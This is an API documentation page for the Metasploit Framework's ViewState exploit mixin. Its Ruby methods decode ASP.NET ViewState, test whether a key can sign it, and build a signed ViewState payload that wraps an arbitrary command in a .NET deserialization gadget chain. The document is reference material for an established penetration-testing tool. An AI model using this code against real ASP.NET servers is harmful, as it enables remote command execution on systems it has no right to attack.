Module: Msf::Exploit::ViewState

Defined in:
lib/msf/core/exploit/viewstate.rb

Instance Method Summary collapse

Instance Method Details

#can_sign_viewstate?(encoded_viewstate, extra: '', algo: 'sha1', key: '') ⇒ Boolean

Returns:

  • (Boolean) 

87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
 
# File 'lib/msf/core/exploit/viewstate.rb', line 87

def can_sign_viewstate?(encoded_viewstate, extra: '', algo: 'sha1', key: '')
  viewstate = decode_viewstate(encoded_viewstate)

  unless viewstate[:data]
    vprint_error('Could not retrieve ViewState data')
    return false
  end

  unless (their_hmac = viewstate[:hmac])
    vprint_error('Could not retrieve ViewState HMAC')
    return false
  end

  our_hmac = generate_viewstate_hmac(
    viewstate[:data] + extra,
    algo: algo,
    key: key
  )

  # Do we have what it takes?
  our_hmac == their_hmac
end

#decode_viewstate(encoded_viewstate, algo: 'sha1') ⇒ Object 


65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
 
# File 'lib/msf/core/exploit/viewstate.rb', line 65

def decode_viewstate(encoded_viewstate, algo: 'sha1')
  viewstate = Rex::Text.decode_base64(encoded_viewstate)

  unless Rex::Text.encode_base64(viewstate) == encoded_viewstate
    vprint_error('Could not decode ViewState')
    return {data: nil, hmac: nil}
  end

  hmac_len = generate_viewstate_hmac('', algo: algo).length

  if (data = viewstate[0...-hmac_len]).empty?
    vprint_error('Could not parse ViewState data')
    data = nil
  end

  unless (hmac = viewstate[-hmac_len..-1])
    vprint_error('Could not parse ViewState HMAC')
  end

  {data: data, hmac: hmac}
end

#generate_viewstate(data, extra: '', algo: 'sha1', key: '') ⇒ Object 


53
54
55
56
57
58
59
 
# File 'lib/msf/core/exploit/viewstate.rb', line 53

def generate_viewstate(data, extra: '', algo: 'sha1', key: '')
  # Generate ViewState HMAC from known values and validation key
  hmac = generate_viewstate_hmac(data + extra, algo: algo, key: key)

  # Append HMAC to provided data and Base64-encode the whole shebang
  Rex::Text.encode_base64(data + hmac)
end

#generate_viewstate_hmac(data, algo: 'sha1', key: '') ⇒ Object 


61
62
63
 
# File 'lib/msf/core/exploit/viewstate.rb', line 61

def generate_viewstate_hmac(data, algo: 'sha1', key: '')
  OpenSSL::HMAC.digest(algo, key, data)
end

#generate_viewstate_payload(cmd, extra: '', algo: 'sha1', key: '') ⇒ Object 


43
44
45
46
47
48
49
50
51
 
# File 'lib/msf/core/exploit/viewstate.rb', line 43

def generate_viewstate_payload(cmd, extra: '', algo: 'sha1', key: '')
  serialized_payload = Msf::Util::DotNetDeserialization.generate(
    cmd,
    gadget_chain: datastore['DotNetGadgetChain'].to_sym,
    formatter: :LosFormatter
  )

  generate_viewstate(serialized_payload, extra: extra, algo: algo, key: key)
end

#initialize(info = {}) ⇒ Object 


27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
 
# File 'lib/msf/core/exploit/viewstate.rb', line 27

def initialize(info = {})
  super

  register_advanced_options([
    OptEnum.new(
      'DotNetGadgetChain',
      [
        true,
        '.NET gadget chain to use in ViewState',
        :TextFormattingRunProperties,
        Msf::Util::DotNetDeserialization::GadgetChains::NAMES
      ]
    )
  ])
end